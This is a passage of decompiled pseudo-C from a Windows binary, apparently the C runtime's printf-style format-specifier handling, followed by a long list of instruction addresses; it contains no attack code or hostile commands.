										asm("inc ecx");
										if(__eflags < 0) {
											goto L97;
										}
										_t416 =  &(_t414[4]);
										__eflags = r11b & r12b;
										if((r11b & r12b) == 0) {
											__eflags = r12b & 0x00000040;
											if((r12b & 0x00000040) == 0) {
												r8d =  *(_t416 - 8);
											} else {
												_t391 =  *(_t416 - 8);
											}
											L106:
											 *(_t387 + 0x50) = _t416;
											L107:
											__eflags = r12b & 0x00000040;
											if((r12b & 0x00000040) != 0) {
												__eflags = _t391;
												if(_t391 < 0) {
													_t391 =  ~_t391;
													asm("inc ecx");
												}
											}
											__eflags = _t257 & r12d;
											if(__eflags == 0) {
												asm("inc ecx");
												if(__eflags >= 0) {
												}
											}
											__eflags = _t314;
											if(_t314 >= 0) {
												r12d = r12d & 0xfffffff7;
												__eflags = _t314 - _t326;
												_t321 =  >  ? _t326 : _t314;
											} else {
												_t321 = 1;
											}
											r14d =  *(_t387 + 0x70);
											_t102 = _t384 + 0x1bf; // 0x1ef
											_t348 = _t102;
											asm("sbb ecx, ecx");
											_t297 = _t273 & _t307;
											__eflags = _t297;
											 *(_t387 + 0x4c) = _t297;
											while(1) {
												_t298 = _t321;
												_t321 = _t321 - 1;
												__eflags = _t298;
												if(_t298 > 0) {
													goto L119;
												}
												L118:
												__eflags = _t391;
												if(_t391 == 0) {
													_t414 =  *(_t387 + 0x50);
													_t110 = _t384 + 0x1bf; // 0x1ef
													_t333 = _t110;
													 *(_t387 + 0x48) = _t321;
													_t259 = _t257 - _t272;
													_t347 =  &(_t348[0]);
													r15d = _t259;
													__eflags = _t326 & r12d;
													if((_t326 & r12d) == 0) {
														goto L31;
													}
													__eflags = _t259;
													if(_t259 == 0) {
														L125:
														_t347 = _t347 - 1;
														r15d = r15d + 1;
														 *_t347 = r13b;
														goto L31;
													}
													__eflags =  *_t347 - r13b;
													if( *_t347 == r13b) {
														goto L31;
													}
													goto L125;
												}
												L119:
												_t108 = _t377 + 0x30; // 0x30
												_t257 = _t108;
												__eflags = _t257 - 0x39;
												if(_t257 > 0x39) {
													_t257 = _t257 + r14d;
													__eflags = _t257;
												}
												 *_t348 = _t257;
												_t348 = _t348 - 1;
												_t298 = _t321;
												_t321 = _t321 - 1;
												__eflags = _t298;
												if(_t298 > 0) {
													goto L119;
												}
												goto L118;
											}
										}
										 *(_t387 + 0x50) = _t416;
										__eflags = r12b & 0x00000040;
										if((r12b & 0x00000040) == 0) {
											r8d =  *(_t416 - 8) & 0x0000ffff;
										} else {
											_t391 =  *(_t416 - 8);
										}
										goto L107;
									}
									L97:
									_t391 =  *_t414;
									_t416 =  &(_t414[4]);
									goto L106;
								}
								__eflags = _t243 - 0x6e;
								if(_t243 == 0x6e) {
									_t378 =  *_t414;
									_t414 =  &(_t414[4]);
									 *(_t387 + 0x50) = _t414;
									_t260 = E6770E81C();
									r10d = 0;
									__eflags = _t260;
									if(_t260 == 0) {
										goto L227;
									}
									_t261 =  *(_t387 + 0x40);
									_t78 = _t406 + 0x20; // 0x20
									r11d = _t78;
									__eflags = r11b & r12b;
									if((r11b & r12b) == 0) {
										 *_t378 = _t261;
									} else {
										 *_t378 = _t261;
									}
									 *(_t387 + 0x6c) = 1;
									goto L169;
								}
								_t273 = 0x6f;
								__eflags = _t243 - 0x6f;
								if(_t243 == 0x6f) {
									r9d = 8;
									__eflags = r12b;
									if(r12b >= 0) {
										goto L93;
									}
									_t326 = 0x200;
									r12d = r12d | 0x00000200;
									goto L94;
								}
								__eflags = _t243 - 0x70;
								if(_t243 == 0x70) {
									_t314 = 0x10;
									asm("inc ecx");
									L81:
									_t262 = 7;
									L82:
									r9d = 0x10;
									 *(_t387 + 0x70) = _t262;
									_t326 = 0x200;
									_t72 = _t402 + 0x20; // 0x20
									r13d = _t72;
									__eflags = r12b;
									if(r12b >= 0) {
										goto L95;
									}
									 *(_t387 + 0x5c) = r13w;
									_t74 = _t402 - 0xe; // -14
									_t307 = _t74;
									 *((short*)(_t387 + 0x5e)) = _t262 + 0x51;
									goto L96;
								}
								__eflags = _t243 - 0x73;
								if(_t243 == 0x73) {
									L46:
									__eflags =  *(_t387 + 0x48) - _t326;
									_t349 =  *_t414;
									_t322 =  ==  ? 0x7fffffff : _t314;
									_t414 =  &(_t414[4]);
									 *(_t387 + 0x50) = _t414;
									__eflags = r11b & r12b;
									if((r11b & r12b) == 0) {
										__eflags = _t349;
										r13d = 1;
										_t347 =  ==  ?  *0x67716198 : _t349;
										 *(_t387 + 0x44) = r13d;
										_t342 = _t347;
										while(1) {
											__eflags = _t322;
											if(_t322 == 0) {
												break;
											}
											_t322 = _t322 - 1;
											__eflags =  *_t342 - r10w;
											if( *_t342 == r10w) {
												break;
											}
											_t342 = _t342 + 2;
											__eflags = _t342;
										}
										_t333 = _t342 - _t347 >> 1;
										r15d = 0x7fffffff;
										goto L32;
									}
									__eflags = _t349;
									r15d = r10d;
									_t347 =  ==  ?  *0x67716190 : _t349;
									_t382 = _t347;
									__eflags = _t322;
									if(_t322 <= 0) {
										goto L31;
									} else {
										goto L48;
									}
									while(1) {
										L48:
										__eflags =  *_t382 - r10b;
										if( *_t382 == r10b) {
											goto L31;
										} else {
											_t377 = _t384 - 0x70;
											_t265 = E6770B1A8( *_t382 & 0x000000ff, _t333, _t407);
											r10d = 0;
											__eflags = _t265;
											if(_t265 != 0) {
												_t382 = _t382 + 1;
												__eflags = _t382;
											}
										}
										r15d = r15d + 1;
										_t382 = _t382 + 1;
										__eflags = r15d - _t322;
										if(r15d < _t322) {
											continue;
										} else {
											goto L31;
										}
									}
									goto L31;
								}
								_t273 = 0x75;
								__eflags = _t243 - 0x75;
								if(_t243 == 0x75) {
									goto L92;
								}
								_t273 = 0x78;
								__eflags = _t243 - 0x78;
								if(_t243 != 0x78) {
									_t320 = 0x2d;
									goto L144;
								}
								_t69 = _t356 - 0x51; // 0x27
								_t262 = _t69;
								goto L82;
							}
							if(__eflags == 0) {
								goto L91;
							}
							__eflags = _t243 - 0x41;
							if(_t243 == 0x41) {
								L60:
								 *(_t384 - 0x78) = 1;
								r13w = r13w + r11w;
								__eflags = r13w;
								L61:
								_t294 = 0x67;
								goto L62;
							}
							__eflags = _t243 - 0x43;
							if(_t243 == 0x43) {
								__eflags = r12d & 0x00000830;
								if((r12d & 0x00000830) == 0) {
									r12d = r12d | r11d;
									__eflags = r12d;
								}
								L55:
								_t266 =  *_t414 & 0x0000ffff;
								_t414 =  &(_t414[4]);
								r13d = 1;
								 *(_t387 + 0x60) = _t266;
								 *(_t387 + 0x44) = r13d;
								 *(_t387 + 0x50) = _t414;
								__eflags = r11b & r12b;
								if((r11b & r12b) == 0) {
									 *(_t384 - 0x40) = _t266;
								} else {
									 *(_t387 + 0x64) = _t266;
									_t333 =  *((intOrPtr*)(_t384 - 0x70));
									 *((intOrPtr*)(_t387 + 0x65)) = r10b;
									_t60 = _t384 - 0x70; // -111
									_t402 = _t60;
									_t377 = _t387 + 0x64;
									_t62 = _t384 - 0x40; // -63
									_t267 = E6770E834(_t326, _t347, _t62, _t377, _t378, _t382,  *((intOrPtr*)(_t333 + 0x10c)), _t402, _t408);
									r10d = 0;
									__eflags = _t267;
									if(_t267 < 0) {
										 *(_t387 + 0x6c) = r13d;
									}
								}
								_t65 = _t384 - 0x40; // -63
								_t347 = _t65;
								r15d = r13d;
								goto L32;
							}
							__eflags = _t243 - 0x45;
							if(_t243 == 0x45) {
								goto L60;
							}
							__eflags = _t243 - 0x47;
							if(_t243 == 0x47) {
								goto L60;
							}
							__eflags = _t243 - 0x53;
							if(_t243 == 0x53) {
								__eflags = r12d & 0x00000830;
								if((r12d & 0x00000830) == 0) {
									r12d = r12d | r11d;
									__eflags = r12d;
								}
								goto L46;
							}
							__eflags = _t243 - 0x58;
							if(_t243 == 0x58) {
								goto L81;
							}
							__eflags = _t243 - 0x5a;
							if(_t243 == 0x5a) {
								_t333 =  *_t414;
								_t414 =  &(_t414[4]);
								 *(_t387 + 0x50) = _t414;
								__eflags = _t333;
								if(_t333 == 0) {
									L43:
									_t347 =  *0x67716190; // 0x67711fb8
									E6770D5B0(_t243, _t347);
									r10d = 0;
									goto L31;
								}
								_t347 =  *((intOrPtr*)(_t333 + 8));
								__eflags = _t347;
								if(__eflags == 0) {
									goto L43;
								} else {
									_t320 = 0x2d;
									asm("inc ecx");
									if(__eflags >= 0) {
										r15d =  *_t333;
										r13d = r10d;
										 *(_t387 + 0x44) = r10d;
									} else {
										_t39 = _t378 - 0x2c; // 0x1
										r13d = _t39;
										asm("cdq");
										 *(_t387 + 0x44) = r13d;
										r15d =  *_t333 - _t302 >> 1;
									}
									goto L33;
								}
							}
							__eflags = _t243 - 0x61;
							if(_t243 == 0x61) {
								goto L61;
							}
							__eflags = _t243 - 0x63;
							if(_t243 == 0x63) {
								goto L55;
							}
							goto L31;
						}
						__eflags = r9d;
						if(r9d == 0) {
							goto L223;
						}
						__eflags = r9d - 7;
						if(r9d != 7) {
							goto L227;
						}
						goto L223;
					}
				}
				L1:
				E6770851C(_t333);
				 *_t333 = 0x16;
				E67709254();
				r11d = 0;
				if( *((intOrPtr*)(_t384 - 0x58)) != r11b) {
					 *( *((intOrPtr*)(_t384 - 0x60)) + 0xc8) =  *( *((intOrPtr*)(_t384 - 0x60)) + 0xc8) & 0xfffffffd;
				}
				goto L226;
			}








































































                                                                                                                                                  0x6770b370
                                                                                                                                                  0x6770b370
                                                                                                                                                  0x6770b370
                                                                                                                                                  0x6770b370
                                                                                                                                                  0x6770b370
                                                                                                                                                  0x6770b370
                                                                                                                                                  0x6770b376
                                                                                                                                                  0x6770b377
                                                                                                                                                  0x6770b378
                                                                                                                                                  0x6770b380
                                                                                                                                                  0x6770b388
                                                                                                                                                  0x6770b38f
                                                                                                                                                  0x6770b396
                                                                                                                                                  0x6770b399
                                                                                                                                                  0x6770b3a5
                                                                                                                                                  0x6770b3aa
                                                                                                                                                  0x6770b3b5
                                                                                                                                                  0x6770b3b8
                                                                                                                                                  0x6770b3bd
                                                                                                                                                  0x6770b3c1
                                                                                                                                                  0x6770b3c4
                                                                                                                                                  0x6770b3ca
                                                                                                                                                  0x6770b3ce
                                                                                                                                                  0x6770b3d2
                                                                                                                                                  0x6770b3d6
                                                                                                                                                  0x6770b3da
                                                                                                                                                  0x6770b3df
                                                                                                                                                  0x6770b3e5
                                                                                                                                                  0x6770b413
                                                                                                                                                  0x6770b417
                                                                                                                                                  0x6770b41a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b41c
                                                                                                                                                  0x6770b420
                                                                                                                                                  0x6770b423
                                                                                                                                                  0x6770b426
                                                                                                                                                  0x6770b429
                                                                                                                                                  0x6770b42d
                                                                                                                                                  0x6770b431
                                                                                                                                                  0x6770b435
                                                                                                                                                  0x6770be4a
                                                                                                                                                  0x6770be4a
                                                                                                                                                  0x6770be4e
                                                                                                                                                  0x6770be50
                                                                                                                                                  0x6770be54
                                                                                                                                                  0x6770be54
                                                                                                                                                  0x6770be54
                                                                                                                                                  0x6770be54
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b43b
                                                                                                                                                  0x6770b43b
                                                                                                                                                  0x6770b43f
                                                                                                                                                  0x6770b43f
                                                                                                                                                  0x6770b442
                                                                                                                                                  0x6770b445
                                                                                                                                                  0x6770b449
                                                                                                                                                  0x6770b449
                                                                                                                                                  0x6770b44d
                                                                                                                                                  0x6770b451
                                                                                                                                                  0x6770b453
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b459
                                                                                                                                                  0x6770b45d
                                                                                                                                                  0x6770b461
                                                                                                                                                  0x6770b464
                                                                                                                                                  0x6770b47b
                                                                                                                                                  0x6770b466
                                                                                                                                                  0x6770b46d
                                                                                                                                                  0x6770b476
                                                                                                                                                  0x6770b476
                                                                                                                                                  0x6770b464
                                                                                                                                                  0x6770b488
                                                                                                                                                  0x6770b48b
                                                                                                                                                  0x6770b492
                                                                                                                                                  0x6770b497
                                                                                                                                                  0x6770b49b
                                                                                                                                                  0x6770b4a0
                                                                                                                                                  0x6770b4a4
                                                                                                                                                  0x6770be87
                                                                                                                                                  0x6770be87
                                                                                                                                                  0x6770be8c
                                                                                                                                                  0x6770be92
                                                                                                                                                  0x6770be97
                                                                                                                                                  0x6770be9a
                                                                                                                                                  0x6770be9e
                                                                                                                                                  0x6770bea0
                                                                                                                                                  0x6770bea4
                                                                                                                                                  0x6770bea4
                                                                                                                                                  0x6770bea4
                                                                                                                                                  0x6770bea4
                                                                                                                                                  0x6770be5d
                                                                                                                                                  0x6770be86
                                                                                                                                                  0x6770be86
                                                                                                                                                  0x6770b4aa
                                                                                                                                                  0x6770b4ad
                                                                                                                                                  0x6770b4b0
                                                                                                                                                  0x6770bcee
                                                                                                                                                  0x6770bcfc
                                                                                                                                                  0x6770bd04
                                                                                                                                                  0x6770bd09
                                                                                                                                                  0x6770bbdf
                                                                                                                                                  0x6770bbdf
                                                                                                                                                  0x6770bbe3
                                                                                                                                                  0x6770be23
                                                                                                                                                  0x6770be23
                                                                                                                                                  0x6770be28
                                                                                                                                                  0x6770be2c
                                                                                                                                                  0x6770be2c
                                                                                                                                                  0x6770be31
                                                                                                                                                  0x6770be31
                                                                                                                                                  0x6770be35
                                                                                                                                                  0x6770be39
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770be39
                                                                                                                                                  0x6770b4b6
                                                                                                                                                  0x6770b4b6
                                                                                                                                                  0x6770b4b8
                                                                                                                                                  0x6770bdf9
                                                                                                                                                  0x6770bdfd
                                                                                                                                                  0x6770be02
                                                                                                                                                  0x6770be07
                                                                                                                                                  0x6770be0c
                                                                                                                                                  0x6770be11
                                                                                                                                                  0x6770be15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770be15
                                                                                                                                                  0x6770b4be
                                                                                                                                                  0x6770b4be
                                                                                                                                                  0x6770b4c0
                                                                                                                                                  0x6770bdac
                                                                                                                                                  0x6770bdb0
                                                                                                                                                  0x6770bdb3
                                                                                                                                                  0x6770bdf3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bdf3
                                                                                                                                                  0x6770bdb5
                                                                                                                                                  0x6770bdb8
                                                                                                                                                  0x6770bdec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bdec
                                                                                                                                                  0x6770bdbf
                                                                                                                                                  0x6770bdc1
                                                                                                                                                  0x6770bde6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bde6
                                                                                                                                                  0x6770bdc8
                                                                                                                                                  0x6770bdca
                                                                                                                                                  0x6770bde0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bde0
                                                                                                                                                  0x6770bdd1
                                                                                                                                                  0x6770bdd3
                                                                                                                                                  0x6770bdd8
                                                                                                                                                  0x6770bdda
                                                                                                                                                  0x6770bdda
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bdd8
                                                                                                                                                  0x6770b4c6
                                                                                                                                                  0x6770b4c6
                                                                                                                                                  0x6770b4c8
                                                                                                                                                  0x6770bd61
                                                                                                                                                  0x6770bd66
                                                                                                                                                  0x6770bda3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bda3
                                                                                                                                                  0x6770bd68
                                                                                                                                                  0x6770bd6b
                                                                                                                                                  0x6770bd6f
                                                                                                                                                  0x6770bd74
                                                                                                                                                  0x6770bd79
                                                                                                                                                  0x6770bd7d
                                                                                                                                                  0x6770bd7f
                                                                                                                                                  0x6770bd85
                                                                                                                                                  0x6770bd8b
                                                                                                                                                  0x6770bd8b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bd7f
                                                                                                                                                  0x6770b4ce
                                                                                                                                                  0x6770b4ce
                                                                                                                                                  0x6770b4d0
                                                                                                                                                  0x6770bd57
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bd57
                                                                                                                                                  0x6770b4d6
                                                                                                                                                  0x6770b4d6
                                                                                                                                                  0x6770b4d8
                                                                                                                                                  0x6770bd11
                                                                                                                                                  0x6770bd16
                                                                                                                                                  0x6770bd47
                                                                                                                                                  0x6770bd4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bd4b
                                                                                                                                                  0x6770bd18
                                                                                                                                                  0x6770bd1b
                                                                                                                                                  0x6770bd1f
                                                                                                                                                  0x6770bd24
                                                                                                                                                  0x6770bd29
                                                                                                                                                  0x6770bd2d
                                                                                                                                                  0x6770bd2f
                                                                                                                                                  0x6770bd35
                                                                                                                                                  0x6770bd37
                                                                                                                                                  0x6770bd37
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bd2f
                                                                                                                                                  0x6770b4de
                                                                                                                                                  0x6770b4de
                                                                                                                                                  0x6770b4e0
                                                                                                                                                  0x6770bbfb
                                                                                                                                                  0x6770bbff
                                                                                                                                                  0x6770bc02
                                                                                                                                                  0x6770bc54
                                                                                                                                                  0x6770bc59
                                                                                                                                                  0x6770bc5e
                                                                                                                                                  0x6770bc76
                                                                                                                                                  0x6770bc76
                                                                                                                                                  0x6770bc7b
                                                                                                                                                  0x6770bc93
                                                                                                                                                  0x6770bc98
                                                                                                                                                  0x6770bc9c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bca7
                                                                                                                                                  0x6770bcab
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bcb6
                                                                                                                                                  0x6770bcba
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bcc5
                                                                                                                                                  0x6770bcc5
                                                                                                                                                  0x6770bcc8
                                                                                                                                                  0x6770bccc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bcd2
                                                                                                                                                  0x6770bcd2
                                                                                                                                                  0x6770bcd5
                                                                                                                                                  0x6770bcd9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bcdf
                                                                                                                                                  0x6770bce3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bce9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bce9
                                                                                                                                                  0x6770bc7d
                                                                                                                                                  0x6770bc83
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bc85
                                                                                                                                                  0x6770bc89
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bc89
                                                                                                                                                  0x6770bc60
                                                                                                                                                  0x6770bc66
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bc68
                                                                                                                                                  0x6770bc6c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bc6c
                                                                                                                                                  0x6770bc04
                                                                                                                                                  0x6770bc07
                                                                                                                                                  0x6770bc4c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bc4c
                                                                                                                                                  0x6770bc0e
                                                                                                                                                  0x6770bc10
                                                                                                                                                  0x6770bc2a
                                                                                                                                                  0x6770bc2e
                                                                                                                                                  0x6770bc33
                                                                                                                                                  0x6770bc43
                                                                                                                                                  0x6770bc35
                                                                                                                                                  0x6770bc35
                                                                                                                                                  0x6770bc39
                                                                                                                                                  0x6770bc39
                                                                                                                                                  0x6770bc12
                                                                                                                                                  0x6770bc12
                                                                                                                                                  0x6770bc17
                                                                                                                                                  0x6770bc1a
                                                                                                                                                  0x6770bc20
                                                                                                                                                  0x6770bc20
                                                                                                                                                  0x6770bc1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bc10
                                                                                                                                                  0x6770b4e6
                                                                                                                                                  0x6770b4e8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b4ee
                                                                                                                                                  0x6770b4f7
                                                                                                                                                  0x6770b4f9
                                                                                                                                                  0x6770b711
                                                                                                                                                  0x6770b714
                                                                                                                                                  0x6770b552
                                                                                                                                                  0x6770b552
                                                                                                                                                  0x6770b557
                                                                                                                                                  0x6770b55c
                                                                                                                                                  0x6770b55c
                                                                                                                                                  0x6770b561
                                                                                                                                                  0x6770bbb2
                                                                                                                                                  0x6770bbb2
                                                                                                                                                  0x6770bbb8
                                                                                                                                                  0x6770bbb8
                                                                                                                                                  0x6770bbbc
                                                                                                                                                  0x6770bbbc
                                                                                                                                                  0x6770bbc0
                                                                                                                                                  0x6770bbc3
                                                                                                                                                  0x6770be1c
                                                                                                                                                  0x6770be20
                                                                                                                                                  0x6770be20
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770be20
                                                                                                                                                  0x6770bbcc
                                                                                                                                                  0x6770bbd1
                                                                                                                                                  0x6770bbd5
                                                                                                                                                  0x6770bbd8
                                                                                                                                                  0x6770bbdc
                                                                                                                                                  0x6770bbdc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bbdc
                                                                                                                                                  0x6770b567
                                                                                                                                                  0x6770b56b
                                                                                                                                                  0x6770baa0
                                                                                                                                                  0x6770baa0
                                                                                                                                                  0x6770baa4
                                                                                                                                                  0x6770baa4
                                                                                                                                                  0x6770baa9
                                                                                                                                                  0x6770baa9
                                                                                                                                                  0x6770baae
                                                                                                                                                  0x6770bab3
                                                                                                                                                  0x6770bab6
                                                                                                                                                  0x6770bab9
                                                                                                                                                  0x6770babd
                                                                                                                                                  0x6770bacc
                                                                                                                                                  0x6770bacc
                                                                                                                                                  0x6770bade
                                                                                                                                                  0x6770bae0
                                                                                                                                                  0x6770bae5
                                                                                                                                                  0x6770bae9
                                                                                                                                                  0x6770baeb
                                                                                                                                                  0x6770baef
                                                                                                                                                  0x6770bafe
                                                                                                                                                  0x6770bb01
                                                                                                                                                  0x6770bb01
                                                                                                                                                  0x6770baef
                                                                                                                                                  0x6770bb06
                                                                                                                                                  0x6770bb09
                                                                                                                                                  0x6770bb71
                                                                                                                                                  0x6770bb71
                                                                                                                                                  0x6770bb7f
                                                                                                                                                  0x6770bb84
                                                                                                                                                  0x6770bb84
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bb0b
                                                                                                                                                  0x6770bb0b
                                                                                                                                                  0x6770bb0e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bb10
                                                                                                                                                  0x6770bb13
                                                                                                                                                  0x6770bb16
                                                                                                                                                  0x6770bb1a
                                                                                                                                                  0x6770bb2a
                                                                                                                                                  0x6770bb2d
                                                                                                                                                  0x6770bb2f
                                                                                                                                                  0x6770bb34
                                                                                                                                                  0x6770bb37
                                                                                                                                                  0x6770bb3a
                                                                                                                                                  0x6770bb3c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bb3e
                                                                                                                                                  0x6770bb4d
                                                                                                                                                  0x6770bb52
                                                                                                                                                  0x6770bb55
                                                                                                                                                  0x6770bb58
                                                                                                                                                  0x6770bb5a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bb5c
                                                                                                                                                  0x6770bb87
                                                                                                                                                  0x6770bb87
                                                                                                                                                  0x6770bb8b
                                                                                                                                                  0x6770bb8b
                                                                                                                                                  0x6770bb8d
                                                                                                                                                  0x6770bbee
                                                                                                                                                  0x6770bbee
                                                                                                                                                  0x6770bbf3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bbf3
                                                                                                                                                  0x6770bb8f
                                                                                                                                                  0x6770bb93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bb95
                                                                                                                                                  0x6770bba5
                                                                                                                                                  0x6770bbaa
                                                                                                                                                  0x6770bbaf
                                                                                                                                                  0x6770bbaf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bbaf
                                                                                                                                                  0x6770bb63
                                                                                                                                                  0x6770bb68
                                                                                                                                                  0x6770bb6b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770bb6b
                                                                                                                                                  0x6770bb09
                                                                                                                                                  0x6770b571
                                                                                                                                                  0x6770b576
                                                                                                                                                  0x6770ba72
                                                                                                                                                  0x6770ba76
                                                                                                                                                  0x6770ba87
                                                                                                                                                  0x6770ba8b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ba8d
                                                                                                                                                  0x6770ba92
                                                                                                                                                  0x6770ba97
                                                                                                                                                  0x6770ba97
                                                                                                                                                  0x6770ba9a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ba9a
                                                                                                                                                  0x6770ba7d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b57c
                                                                                                                                                  0x6770b57c
                                                                                                                                                  0x6770b581
                                                                                                                                                  0x6770b581
                                                                                                                                                  0x6770b586
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b586
                                                                                                                                                  0x6770b576
                                                                                                                                                  0x6770b71a
                                                                                                                                                  0x6770b71f
                                                                                                                                                  0x6770b721
                                                                                                                                                  0x6770b6ea
                                                                                                                                                  0x6770b6ef
                                                                                                                                                  0x6770b6f3
                                                                                                                                                  0x6770b6f7
                                                                                                                                                  0x6770b6f9
                                                                                                                                                  0x6770b6fb
                                                                                                                                                  0x6770b95d
                                                                                                                                                  0x6770b970
                                                                                                                                                  0x6770b972
                                                                                                                                                  0x6770b978
                                                                                                                                                  0x6770b97b
                                                                                                                                                  0x6770b97f
                                                                                                                                                  0x6770b982
                                                                                                                                                  0x6770b9ab
                                                                                                                                                  0x6770b9ae
                                                                                                                                                  0x6770b9ae
                                                                                                                                                  0x6770b9b8
                                                                                                                                                  0x6770b9bc
                                                                                                                                                  0x6770b9c5
                                                                                                                                                  0x6770b9c8
                                                                                                                                                  0x6770b9cc
                                                                                                                                                  0x6770b9d6
                                                                                                                                                  0x6770b9de
                                                                                                                                                  0x6770b9e1
                                                                                                                                                  0x6770b9ec
                                                                                                                                                  0x6770b9ef
                                                                                                                                                  0x6770b9f4
                                                                                                                                                  0x6770b9f9
                                                                                                                                                  0x6770b9f9
                                                                                                                                                  0x6770b9ff
                                                                                                                                                  0x6770ba01
                                                                                                                                                  0x6770ba04
                                                                                                                                                  0x6770ba0d
                                                                                                                                                  0x6770ba13
                                                                                                                                                  0x6770ba1a
                                                                                                                                                  0x6770ba1a
                                                                                                                                                  0x6770ba04
                                                                                                                                                  0x6770ba21
                                                                                                                                                  0x6770ba25
                                                                                                                                                  0x6770ba27
                                                                                                                                                  0x6770ba29
                                                                                                                                                  0x6770ba32
                                                                                                                                                  0x6770ba38
                                                                                                                                                  0x6770ba3f
                                                                                                                                                  0x6770ba3f
                                                                                                                                                  0x6770ba29
                                                                                                                                                  0x6770ba41
                                                                                                                                                  0x6770ba46
                                                                                                                                                  0x6770ba49
                                                                                                                                                  0x6770ba4b
                                                                                                                                                  0x6770ba50
                                                                                                                                                  0x6770ba50
                                                                                                                                                  0x6770ba50
                                                                                                                                                  0x6770ba56
                                                                                                                                                  0x6770ba5b
                                                                                                                                                  0x6770ba5e
                                                                                                                                                  0x6770ba68
                                                                                                                                                  0x6770ba68
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ba68
                                                                                                                                                  0x6770b984
                                                                                                                                                  0x6770b98d
                                                                                                                                                  0x6770b992
                                                                                                                                                  0x6770b996
                                                                                                                                                  0x6770b999
                                                                                                                                                  0x6770b707
                                                                                                                                                  0x6770b707
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b707
                                                                                                                                                  0x6770b99f
                                                                                                                                                  0x6770b9a2
                                                                                                                                                  0x6770b9a4
                                                                                                                                                  0x6770b9a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b9a4
                                                                                                                                                  0x6770b95f
                                                                                                                                                  0x6770b963
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b965
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b965
                                                                                                                                                  0x6770b701
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b701
                                                                                                                                                  0x6770b723
                                                                                                                                                  0x6770b728
                                                                                                                                                  0x6770b72a
                                                                                                                                                  0x6770b83a
                                                                                                                                                  0x6770b83a
                                                                                                                                                  0x6770b83a
                                                                                                                                                  0x6770b83e
                                                                                                                                                  0x6770b83e
                                                                                                                                                  0x6770b844
                                                                                                                                                  0x6770b844
                                                                                                                                                  0x6770b849
                                                                                                                                                  0x6770b849
                                                                                                                                                  0x6770b84f
                                                                                                                                                  0x6770b84f
                                                                                                                                                  0x6770b853
                                                                                                                                                  0x6770b853
                                                                                                                                                  0x6770b858
                                                                                                                                                  0x6770b85b
                                                                                                                                                  0x6770b866
                                                                                                                                                  0x6770b86b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b86d
                                                                                                                                                  0x6770b871
                                                                                                                                                  0x6770b874
                                                                                                                                                  0x6770b88f
                                                                                                                                                  0x6770b893
                                                                                                                                                  0x6770b89b
                                                                                                                                                  0x6770b895
                                                                                                                                                  0x6770b895
                                                                                                                                                  0x6770b895
                                                                                                                                                  0x6770b89f
                                                                                                                                                  0x6770b89f
                                                                                                                                                  0x6770b8a4
                                                                                                                                                  0x6770b8a4
                                                                                                                                                  0x6770b8a8
                                                                                                                                                  0x6770b8aa
                                                                                                                                                  0x6770b8ad
                                                                                                                                                  0x6770b8af
                                                                                                                                                  0x6770b8b2
                                                                                                                                                  0x6770b8b2
                                                                                                                                                  0x6770b8ad
                                                                                                                                                  0x6770b8b7
                                                                                                                                                  0x6770b8ba
                                                                                                                                                  0x6770b8bc
                                                                                                                                                  0x6770b8c1
                                                                                                                                                  0x6770b8c1
                                                                                                                                                  0x6770b8c1
